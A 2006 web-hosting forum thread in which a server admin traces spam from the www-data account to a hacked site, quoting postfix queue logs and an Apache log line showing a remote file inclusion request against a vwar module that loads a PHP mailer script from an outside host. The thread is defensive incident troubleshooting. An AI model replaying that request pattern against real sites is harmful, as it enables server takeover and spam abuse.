spam from my server ?

Discussion in 'General' started by rayit, May 17, 2006.

  1. rayit

    rayit Member

    spam from my server from account www-data?

    Seems my server was listed on some spam filter sites..

    I see al lot of messages in the mailq.
    all starting with www-data@.....

    how to prevend this, what is it???


    thanks

    Raymond
    RayIT

    After some googling something like this should be in the vhost file
    to know which domain is giving the problem???

    php_admin_value sendmail_path "/usr/sbin/sendmail -t -i -fUSER at example.com"

    maybe for future updates of ISPCONFIG??

    Are there other sollutions??

    <b>Biggest problem is I can not find the website which has the bad script??!!!</b>

    example:

    May 17 06:39:07 ns1 postfix/qmgr[32348]: 60A0C372868: from=<[email protected]>, size=4422, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 6559F3728E0: from=<[email protected]>, size=4423, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 6D48E373256: from=<[email protected]>, size=4418, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 66857372E3C: from=<[email protected]>, size=4423, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 6CA233732CE: from=<[email protected]>, size=4427, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 619D9372802: from=<[email protected]>, size=4422, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 67217372C41: from=<[email protected]>, size=4412, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 6A6FA372831: from=<[email protected]>, size=4425, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 6F496372827: from=<[email protected]>, size=4419, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 650D6372B01: from=<[email protected]>, size=4417, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 61AD43728AE: from=<[email protected]>, size=4418, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 627E7372D8A: from=<[email protected]>, size=4424, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 64C7237317B: from=<[email protected]>, size=4421, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 69DCD3729D5: from=<[email protected]>, size=4412, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 694713729E7: from=<[email protected]>, size=4418, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 65149372A83: from=<[email protected]>, size=4415, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 67DEA372EF5: from=<[email protected]>, size=4415, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 67FFC372EFA: from=<[email protected]>, size=4414, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 6BEB1372EA2: from=<[email protected]>, size=4418, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 63935372D18: from=<[email protected]>, size=4418, nrcpt=1 (queue active)
    May 17 06:39:07 ns1 postfix/qmgr[32348]: 6B528372FF8: from=<[email protected]>, size=4423, nrcpt=1 (queue active)
     
    Last edited: May 17, 2006
  2. falko

    falko Super Moderator ISPConfig Developer

    Seems like someone is abusing a contact form, guestbook, etc. on one of your web sites to send spam...
     
  3. rayit

    rayit Member

    how do i know which web?

    I can not find which web is causing the problem.

    :eek:
     
  4. falko

    falko Super Moderator ISPConfig Developer

    You could check your Apache's access log.
     
  5. rayit

    rayit Member

  6. rayit

    rayit Member

    problem probably found

    www.bob-gaming.nl||||163464||||81.199.83.160 - - [17/May/2006:10:29:27 +0200]
    "POST /modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?
    HTTP/1.1" 200 163464
    "http://www.bob-gaming.nl/modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?"
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


    Seems to be the problem, I think.
     
  7. Norman

    Norman Member HowtoForge Supporter

    Turn him off asap and ask user to resolve.
     
  8. till

    till Super Moderator Staff Member ISPConfig Developer

    I can only agree to Norman, turn the account off as soon as possible, e.g. with an .htaccess file. Your spam problem seems to be only the pike of the iceberg. The script seems to allow execution of external PHP code provided by an URL to the variable vwar_root.
     
  9. rayit

    rayit Member

    thanks

    I chmod 000 the files and made user root
    hopefully if user will update to newest release problems will be fixed..

    Will point the webmaster of the site to

    http://www.vwar.de/

    various security leaks which could allow malicious users to include a (remote) file and eg. execute php commands on the server hosting vwar

    thanks

    Raymond
    RayIT
     
  10. dayjahone

    dayjahone Member

    I think I have the same problem. Sorry for the lame question, but where do I go to look at the apache log? I'm running Ubuntu.
     
    Last edited: Mar 15, 2012
  11. dayjahone

    dayjahone Member

    My access log file is empty. Is there someplace special where ISPConfig keeps the apache logs? I'm trying to identify which website might be causing the problem.
     
  12. till

    till Super Moderator Staff Member ISPConfig Developer

    See /var/log/httpd/ispconfig_access_log
     

Share This Page